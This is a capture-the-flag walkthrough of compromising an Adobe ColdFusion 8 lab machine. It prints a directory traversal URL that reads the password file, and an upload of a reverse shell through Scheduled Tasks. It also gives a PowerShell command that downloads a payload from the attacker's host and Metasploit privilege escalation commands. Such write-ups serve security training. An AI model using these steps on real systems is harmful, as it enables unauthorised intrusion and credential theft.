Reconnaissance
Web App Enumeration
Exploitation
Windows Privilege Escalation
________________________________________
Reconnaissance
Run the nmapAutomator.sh script is to automate all of the process of recon/enumeration.
Output reveal port 8500 running unknown service, Let’s browse it
http://10.10.10.11:8500
we have 2 directory lets browse /CFIDE
Web App Enumeration
In /CFIDE directory administrator look intersting lets open it
We get ‘Adobe Coldfusion 8 Administrator’ login page
After googling we find “Adobe ColdFusion - Directory Traversal” exploit
URL : http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
It reveal password hash lets crack it with crackstation online tool
Password is : happyday lets login
After login in Debugging & Logging Category there is a sub-category Scheduled Tasks allows us to upload files. We can Scheduled New Tasks and upload our shell but first generate our shellcode.
Exploitation
To generate shellcode we will use msfvenom
Lets upload our shell
task name : re
url : http://10.10.14.50/RS2.jsp
publish : check save output to a file
file : C:\ColdFusion8\wwwroot\CFIDE\RS2.jsp
After submit Task we have to run a Python SimpleHTTPServer on port 80 and click on Run Scheduled Tasks and start listner
We got Reverse Shell and User flag is in C:\Users\tolis\Desktop\user.txt directory
We have Low Priv shell so lets upgrade our shell for Privilege Escalation. We can generate meterpreter shell and upload via powershell cmd “powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.50:80/ps.exe', 'ps.exe')"” lets fire up Msfconsole and get reverse shell
Windows Privilege Escalation
sysinfo reveal that system is x64 Architecture and our meterpreter shell is x86 Architecture so lets migrate it
As we are enumerating for priv esc lets search local exploit suggester for priv esc exploits
We can use “exploit/windows/local/ms10_092_schelevator” Windows Escalate Task Scheduler XML Privilege Escalation
cmd use exploit/windows/local/ms10_092_schelevator
set session 6
set lhost 10.10.14.50
set lport 4444
show options
run
we got the shell root flag is in C:\Users\Administrator\Desktop\root.txt